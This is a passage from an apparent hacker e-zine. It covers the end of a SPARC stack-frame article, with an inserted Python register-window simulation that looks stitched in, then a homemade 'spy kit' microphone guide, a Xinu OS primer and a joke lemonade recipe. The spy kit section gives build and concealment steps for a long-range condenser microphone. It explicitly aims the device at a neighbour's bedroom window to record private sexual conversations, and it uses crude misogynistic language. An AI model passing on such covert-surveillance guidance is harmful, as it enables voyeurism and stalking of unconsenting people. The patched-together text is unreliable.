            +-------------------------+

            +-------------------------+
            | space dynamically       |
            | allocated via the       |
            | alloca() library call   |
            +-------------------------+
            | space, if needed, for   |
            | automatic arrays,       |
            | aggregates, and         |
            | addressable scalar      |
            | automatics              |
            +-------------------------+
    %fp -->
                 high addresses

Should be fairly self-explanatory...
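The window overlap and the overflow/underflow traps described above, as a small Python simulation added here (it is not from the article or from Peter's page). The class and function names, the starting CWP, and the simplified trap handler that spills or refills one 16-word frame of IN and LOCAL registers per trap are assumptions of this sketch.

```python
O0, L0, I0 = 8, 16, 24      # r[] addresses of %o0, %l0, %i0 from the table above


class RegisterFile:
    """Toy SPARC integer register file with overlapping windows."""

    def __init__(self, nwindows=8):
        self.n = nwindows
        self.globals = [0] * 8
        # Per window: 8 in registers followed by 8 local registers (16 words).
        self.windowed = [0] * (16 * nwindows)
        # Assumed start state: window n-1 is the invalid one (as in the figure)
        # and the program starts in window n-2.
        self.wim = nwindows - 1     # index of the single bit set in WIM
        self.cwp = nwindows - 2
        self.memory = []            # stack of spilled 16-word frames
        self.overflows = 0
        self.underflows = 0

    def _phys(self, r):
        if not 8 <= r <= 31:
            raise ValueError("windowed registers are r[8]..r[31]")
        if r <= 15:                 # out: shared with the ins of window cwp-1
            return ((self.cwp - 1) % self.n) * 16 + (r - 8)
        if r <= 23:                 # local: private to this window
            return self.cwp * 16 + 8 + (r - 16)
        return self.cwp * 16 + (r - 24)     # in

    def read(self, r):
        return self.globals[r] if 0 <= r < 8 else self.windowed[self._phys(r)]

    def write(self, r, value):
        if r == 0:
            return                  # %g0 always reads as zero
        if 0 < r < 8:
            self.globals[r] = value
        else:
            self.windowed[self._phys(r)] = value

    def save(self):
        """Procedure entry: decrement CWP, spilling the oldest frame on overflow."""
        new = (self.cwp - 1) % self.n
        if new == self.wim:         # window overflow trap
            self.overflows += 1
            oldest = (new - 1) % self.n
            self.memory.append(self.windowed[oldest * 16:oldest * 16 + 16])
            self.wim = oldest
        self.cwp = new

    def restore(self):
        """Procedure return: increment CWP, refilling from memory on underflow."""
        new = (self.cwp + 1) % self.n
        if new == self.wim:         # window underflow trap
            self.underflows += 1
            self.windowed[new * 16:new * 16 + 16] = self.memory.pop()
            self.wim = (new + 1) % self.n
        self.cwp = new


def nested_calls(depth, nwindows=8):
    """Run `depth` nested calls and returns; report traps and data integrity."""
    rf = RegisterFile(nwindows)
    rf.write(L0, 1000)                      # a local in the outermost frame
    ok = True
    for d in range(1, depth + 1):
        rf.write(O0, d)                     # caller passes the argument in %o0
        rf.save()
        ok &= rf.read(I0) == d              # callee sees the same word as %i0
        rf.write(L0, 1000 + d)
    for d in range(depth, 0, -1):
        ok &= rf.read(L0) == 1000 + d       # locals survived spill and refill
        rf.write(I0, -d)                    # callee returns a value in %i0
        rf.restore()
        ok &= rf.read(O0) == -d             # caller reads it back from %o0
    ok &= rf.read(L0) == 1000
    return rf.overflows, rf.underflows, ok


if __name__ == "__main__":
    for depth in (6, 7, 10):
        print(depth, nested_calls(depth))
```

With 8 windows and one marked invalid, six nested calls fit in registers; the seventh is the first to trap.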
Additional Sparc resources you may want to look into about sparc asm: URLs: [1] http://www.xgc.com/manuals/m1750-ada/xgc-ada-gdb/x3398.html [2] http://www.users.qwest.net/~eballen1/ [3] http://docs.sun.com/?q=assembly Books: [1] SPARC Architecture, Assembly Language Programming, and C (2nd Edition) Richard P. Paul ISBN: 0130255963 [2] SPARC Assembly Language Reference Manual (Solaris 8) Sun Microsystems, Inc ISBN: 1400522803 . . . . . . . . XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [0x07] How to build a leet recording spy kits .x[wolfinux].x XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX through out this article, i'll be referring by "leet recording spy kit" (or lrsk(c)) to an inexpensive home made audio spying system. the idea is to have a box, with your favorite audio recorder, capable of capturing clean sounds over 50 yards without having the signal headroom bottlenecked by proximity noises. (why? might get you some pussy.) first, the most sensitive types of microphones are condensors which uses a double layered capacitor mechanism to convert air waves into electric signals. first thing you need is a the super mic.o-O 1) pass by a perchman at lunch break, and steal his shotgun ^-- elite 2) get leet and build your own ^-- gay(more suitable for this issue) MICROPHONE CIRCUIT SCHEMATIC R1 -----------*------/\/\/\------*------------ | | | + | + | | | | | --- --- === | C1 ^ C2 ^ B1 - 9V | ===== ===== === | === === | | = = | | | | ===== | === | = | | | \ | Signal \------------------------------------------------> Ground MIKE /------------------------------------------------> / | | | | ===== === = Ground this is a pressure zone mic (PZM) in a perfect world, this would be the simplest explanation of the circuitry envolved. B1 is a 9V battery with two leads. C1 is 0.1 uF ceramic monolithic capacitor mounted as close as possible to the microphone element terminals. 
This capacitor primarily functions to limited radio frequency (RF) interference. The circuit will work without it but it will be more susceptible to RF. MICROPHONE ELEMENT - Any small electret condenser microphone element should work. RadioShack got one with a fairly uniform frequency response for about $3 US R1 is a 3.3k, ~1/8watt, carbon film resistor. This part will deal with the amperage in the circuit. next thing we need is audio cables don't go gayass-cheap on this item!! or you'll get ground loops and RF interference all over! get a decent 3-conductor cable (Canare kicks ass) for the plug, you need an XLR (? & ?) it goes like this: pin 1 ---> signal (-) pin 2 ---> signal (+) pin 3 ---> ground rosin-core solder is recommended for soldering the connections. and remember if you cross link 1 and 2, you'll have a 6db reduction due to mis-phased signal. (crossing 1 and 3 will be unshielded, but mostly okay) now, having meticulously mounted the microphone element, and the circuit parts -==- you need a plastic diner plate (25 cm wide) and drill a tiny (0.5 cm) hole about 3 cm off the center. turn the plate, and mount the microphone element through the hole you made and duck tape it. the 9v power supply should be well stabilised also. now turn back the plate, and apply a plastic food wrap layer over it. (this is mostly humid proofing, or else you will have static hushes after the first night of neighbour MILF stalking)<---h0h0h0 :/ next thing you need is 2 plastic flower pots.one big enough to house the little one. cut the base of the smaller one, and mount your plate on top of it, duck tape it. drill a hole in down the bigger pot's base, to pass the audio cable through. -==- house the little pot inside the big one. and cover the top with a cotton/polly cloth or a piece of clean foam. 
and your lrsk(c) will look something like: foam --> ________________________ /| |\ big pot -------> | | | | | | | | | \___ * ________/ | | | | | | pressure zone cabinet-------> | | | | | | | | baby pot --------> | | | | | | | | | |____|___|_________|___| | | audio cable ---> |____________________~ the last part is choosing your recording media. since you have a +48 DC (phantom powered mic) and I'm assuming you got not pre amplifier at home that handles it, i say you might need a DI converter. a DI (direct inject box) is a little piece of hardawre that converts your mic audio signal to line audio signal. you can find those from BSS, Behringer products, but I say for your neighbourhood espionnage, let's go for something cheaper. You can find a little plug converter, powered by a 1.5 AA in most of music stores, guitar shops, electronics... that looks something like this: tip ---> /\ -- ring ---> | | |--| | | sleeve ---> | | | | | | ------- | | | | power supply----> | | | | |_______| | ? ? ? | female XLR ---> | ? ? ? | |_^_^_^_| this is a typical converter, with a TRS 1/4" jack plug. now you need an audio appliance with a Jack input. that could be a Hi Fi stereo system, a DVD player with karaoke mic input, a guitar amplifier... or better your sound card (since you want to save your neighbour's sex convos) what you need is to camouflage your lrsk(c) and point it to the MILF bedroom window. (PS: if done with care, this PZM mic will capt sounds at amazing distances. and keep in mind that the audio cable length should be less than 15 meters) ---===<<<<>>===--- . . . . . . . . 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Table of contents:

[1] - Compiling and running source code
[2] - Architecture details
[3] - Outro, Credits, Shoutz, Resources & Fin

The version that will be described in this article is 7.0. I don't think anyone will ever be able to use any of this stuff, so it will be strictly educational for the specially interested [if you don't care about rare o/s'es just skip the section, no one will be forcing you to read]. Xinu OS is made by Sun. Xinu is an educational system.

[1] - Compiling and running source code

Here I will describe how to compile and run programs on a Xinu system. You use the tool 'xcc' to compile programs, and 'getxinu' to run the output. These tools are located in ~xinu/bin.

Here is some Xinu source code that will just print some text and exit:

    #include
    main()
    {
        printf("zippa dee doo dah\n");
    }

To compile/link the program type:

    xcc zippa.c

Something to note about the Xinu compiler xcc is that it behaves nearly identically to gcc, except for 2 parameters that behave differently from standard gcc usage. Then, if no problems occur, an executable image will be created in the file a.out. Use the getxinu command to run this on the system like this:

    getxinu a.out

(type 'getxinu -m xxx a.out' to specify a specific xinu machine to run on, where xxx = the specific machine)

On Xinu networks, if there are no free Xinu machines, the user will usually be queued and have to wait until a machine is unused. To stop waiting, you can type 'q' to quit or 's' to see the queue status. When a machine is available you will see a msg printed reporting which machine you are assigned to, and you are connected to that very machine and get the console. The remaining stuff is to load and run the Xinu program, a.out.
We have to put the machine in a state where the PROM monitor has control. Press RETURN a few times to check this. When the monitor is running it will answer with its prompt '>'. Otherwise the machine is running someone else's leftover Xinu program or it has crashed. Type '\b' to send a BREAK, which will cause the machine to stop whatever it is doing and return to the monitor. Now you can usually load the xinu program and run it by issuing the proper boot command to the monitor:

    ble() yourlogin/progname

(progname = a.out)

You will see something like this:

    Xinu Version 7.0 SUN3
    620795 bytes real mem
    43404 bytes Xinu code
    clock enabled
    zippa dee doo dah
    All user processes have completed.

[2] - Architecture Details

Now, type \q to quit getxinu, and let's go on looking at some architecture details showing how the xinu sys uses the motorola 68010/68020 processors. These processors are standard 32-bit processors. The 68010 can move or operate on data located in its registers or in memory, and can also receive interrupts from external sources and the like. The 68000 series processors differentiate between registers that hold data and registers that keep addresses. There are 8 data registers referred to as 'd0' thru 'd7', 7 standard address registers ('a0' thru 'a6') and the special stack address register, which is a7. There is also a status reg. (sr) and the program counter (pc).

When your xinu k0d3 is booted the machine is placed in supervisor mode. Once booted, xinu never puts the machine in user mode while it is operating, i.e. source code is always run in supervisor mode, therefore you can access the system byte of the status register, which is 16 bits wide. The lower 8 bits are the user byte and their interpretations are shown in this table taken from ugrad.cs.ubc.ca:

    Bit     Meaning
    ==================
    0       Carry Flag
    1       Overflow Flag
    2       Zero Flag
    3       Negative Flag
    4       Extend Flag
    5-7     Not Used

    Status Register User Byte

The user byte just contains arithmetic flags.
The upper bits (system byte) are shown HERE:

    Bit     Meaning
    ==========================
    0-2     Interrupt Level Mask
    3-4     Not Used
    5       Supervisor Mode Flag
    6       Not Used
    7       Trace Mode Flag

    Status Register System Byte

The supervisor mode bit controls whether the processor is in supervisor mode or not (bit = 1 --> supervisor mode), while the "trace mode" bit works the same way. In "trace mode", a "trace exception" is created as an effect of each instruction that is executed. The first 3 bits are used to make an interrupt priority level, which is interpreted as a number 0 thru 7. If the level is set to N, all the interrupts that are not greater than N will be ignored.

[3] - Various other information

- the source for routines is in the dir ~xinu/xinu.sun3/src/sys/sys and the header files are in ~xinu/xinu.sun3/src/sys/h.
- use the xcc parameter -S to generate assembly code for your application.
- format of xinu stack frame:

                +-----------------------+
    SP          |                       |
                +-----------------------+
    (-n*4)      |   local variable n    |
                +-----------------------+
                .                       .
                .                       .
                .                       .
                +-----------------------+
    (-8)        |   local variable 2    |
                +-----------------------+
    (-4)        |   local variable 1    |
                +-----------------------+
    A6          |        old A6         |
                +-----------------------+
    (+4)        |    return address     |
                +-----------------------+
    (+8)        |      parameter 1      |
                +-----------------------+
    (+12)       |      parameter 2      |
                +-----------------------+
                .                       .
                .                       .
                .                       .
                +-----------------------+
    (+n*4+4)    |      parameter n      |
                +-----------------------+

At any time during the execution of a process, its stack consists of those stack frames piled end to end, with the sp pointing just under the local variables of the active stack frame. stack ascii from ugrad.cs.ubc.ca.

[3] - Outro, Credits, Shoutz, Resources & Fin

All in all Xinu is a fine operating system with its threads and micro kernel architecture, which makes it fit for embedded applications. It even has a TCP/IP stack! Even so, I doubt the xinu o/s is going to take over the IT world, heh.
Remember, you probably won't be able to do anything with this information, it's cool learning. Thanks to ugrad.cs.ubc.ca for being the resource of 99% of the info, so thanks to Peter Phillips, Graeme Clark, Terry Coatta, and Barry Brachman. Shoutz go to all cool people on the eris free network that know me.

URLs:
[1] http://www.sci.csuhayward.edu/~billard/cs4560/node21.html
[2] http://www.cs.purdue.edu/homes/brylow/xinu/

Also you should grab the book "Internetworking with TCP/IP", which uses Xinu (if anyone really cares). That's it.

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x09] Making the Perfect Summertime Lemonade .x[t.Transient]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

// Making the Perfect Summertime Lemonade
// t.Transient (bill@microsoft.com)

********** DISCLAIMER **************
!!!!!!READ AT YOUR OWN RISK!!!!!!!!!

I nor b4b0 take responsibility for the contents within! If you squirt lemon juice in yer eye, it's yer own fault. Also, this is only 0day until around September; then autumn comes and everything changes.

Also, Kraft Foods(TM) wants you to know this about Kool-Aid(TM)(R)(C):
http://www.kraftfoods.com/koolAid/ka_privacy.html

'0h J34h!' may or may not be Copyright(C) Kraft Foods, Inc. (Notice their use of a 'K' to simulate 1337sp34k. Phagz.).

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
************************************

Ok folks, listen up. I'm going to say this once, and only once. I don't have time to be schooling you kids all day. I have things to do. Follow my instructions and you'll have the *perfect* summertime lemonade. Deviate and... well.. you won't. Expert haqrs only!

** STEP ONE: GO TO THE STORE

A crucial step. Not getting to the store can mean not getting a packet of lemonade flavored Kool-Aid(TM), which is what you need if you're going to pull this off.
++++++++NEWBIE NOTE: If a huge-ass pitcher with a face on it busts through the wall and yells:

------------------------------------------------------------
root@blackdove~# sysvbanner OH JEA\!\!\!@#$
[sysvbanner output: the argument rendered in large '#' block letters]
root@blackdove~#
------------------------------------------------------------

don't be alarmed. This happens all the time. The crazy bastard appears everywhere incessantly. Just walk away and ignore him; leading him on only makes things worse.

ANYWAYS..............

** STEP TWO: GO BACK TO YOUR HOUSE.

Assuming that you have a house. Chances are you live in an apartment with your mom, or all by yourself. Whatever, that works. Just go back to where you came from.

** STEP THREE: GET A BIG-ASSED GLASS THING

In the midwest they're called 'pitchers'. Dunno what you commies in NY and CA call em... as for those of you outside the States, I won't even venture or bother to assume. Go find a big glass container, clear out all the dead bugs (since you haven't used it since last summer), and pour HALF of the powder into it..... I SAID HALF....... ..... HALF == 1/2 == .5.

** STEP FOUR: JUST ADD WATER

If you're in a communist nation (ie. Canada, or France), water might be rationed out. If you're in America, it's plentiful and you can just flip open your thingie on the sink and fill up the glass container us cowboys call a 'pitcher'. Fill it up until it's 3/4 of the way full.

** STEP FIVE: Add Kool-Aid(TM)

Put the rest of the Kool-Aid(TM) in the pitcher with the water and the first dose of Kool-Aid(TM). Stir with a wooden spoon (the same kind that your mom used to beat you with). LISTEN TO ME VERY CAREFULLY: Let this sit for 10 minutes.
Add a squirt of lemon juice from a real lemon. Add THREE cubes of ice.

** STEP SIX: 0H J34H!!!!#@$

Drink it.

- 0day from t.Transient
Property of b4b0

. . . . . . . .

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX